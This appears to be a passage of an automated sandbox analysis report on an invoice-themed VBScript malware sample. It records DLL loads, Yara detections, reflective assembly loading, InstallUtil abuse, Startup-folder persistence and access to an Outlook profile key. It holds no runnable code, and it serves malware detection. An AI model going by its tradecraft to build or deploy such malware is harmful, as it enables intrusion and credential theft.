Source: C:\Windows\System32\wscript.exe Section loaded: wlidprov.dll
Source: C:\Windows\System32\wscript.exe Section loaded: samcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: provsvc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: usermgrproxy.dll
Source: C:\Windows\System32\wscript.exe Section loaded: acppage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: aepic.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: atl.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: msisip.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: wshext.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: napinsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wshbth.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: nlaapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winrnr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Fattura-24SC-99245969925904728562.vbs Static file information: File size 2500641 > 1048576
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1423198807.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005437000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000006386000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.00000000061E6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1423198807.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005437000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000006386000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.00000000061E6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: powershell.pdbUGP source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000000.1312087444.00000000003D1000.00000020.00000001.01000000.00000005.sdmp, OSDescription.vbs.exe, 0000000F.00000000.1514068078.0000000000348000.00000020.00000001.01000000.0000000C.sdmp, OSDescription.vbs.exe.13.dr, Fattura-24SC-99245969925904728562.vbs.exe.4.dr
Source: Binary string: protobuf-net.pdbSHA256}Lq source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: powershell.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000000.1312087444.00000000003D1000.00000020.00000001.01000000.00000005.sdmp, OSDescription.vbs.exe, 0000000F.00000000.1514068078.0000000000348000.00000020.00000001.01000000.0000000C.sdmp, OSDescription.vbs.exe.13.dr, Fattura-24SC-99245969925904728562.vbs.exe.4.dr
Source: Binary string: protobuf-net.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8400000.2.raw.unpack, MerchantContainerStrategy.cs .Net Code: SearchFilter System.Reflection.Assembly.Load(byte[])
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8910000.4.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8910000.4.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8910000.4.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8910000.4.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.8910000.4.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: Yara match File source: 9.2.InstallUtil.exe.23e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.9f60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.1422431718.0000000009F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1547078793.0000000004BC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1377378668.0000000005095000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1452651093.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Fattura-24SC-99245969925904728562.vbs.exe PID: 7764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7928, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: OSDescription.vbs.exe PID: 6024, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 2980, type: MEMORYSTR
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A0306A0 push ebx; retf 7_2_0A0306A3
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A03BD0A push B9FFFFFFh; ret 7_2_0A03BD14
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A03E584 push F0B9046Ah; ret 7_2_0A03E58A
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A345319 push B9FFFFE5h; ret 7_2_0A34531E
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A34245C push B9FFFFE4h; ret 7_2_0A342472
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A3438E2 push B9FFFFF9h; ret 7_2_0A3438E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_00A521E1 push 8BD88B00h; retf 9_2_00A521E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_023DEE10 push edi; ret 9_2_023DEE16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C335FF push ds; ret 9_2_04C3363A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C33547 push es; ret 9_2_04C3354A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C3354B push ss; ret 9_2_04C33562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C33563 push ds; ret 9_2_04C335A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C33687 push es; ret 9_2_04C33692
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C337CB push ds; ret 9_2_04C337DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C337F3 push es; ret 9_2_04C337F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C337F7 push cs; ret 9_2_04C337FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C33797 push ds; ret 9_2_04C3379A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C337A7 push ss; ret 9_2_04C337AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C33707 push es; ret 9_2_04C3370A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C3371B push ss; ret 9_2_04C33726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C33727 push cs; ret 9_2_04C3372A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C31897 push BE000000h; retn 0000h 9_2_04C3189C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C3389B push ds; ret 9_2_04C338A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C338A7 push es; ret 9_2_04C338AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C338AB push cs; ret 9_2_04C338B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C33807 push cs; ret 9_2_04C3380A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C339EF push ss; ret 9_2_04C339F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C33983 push cs; ret 9_2_04C33986
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C33987 push ds; ret 9_2_04C3398A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C33997 push cs; ret 9_2_04C3399E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04C3399F push es; ret 9_2_04C339B6

Persistence and Installation Behavior

Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe
Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Boot Survival

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
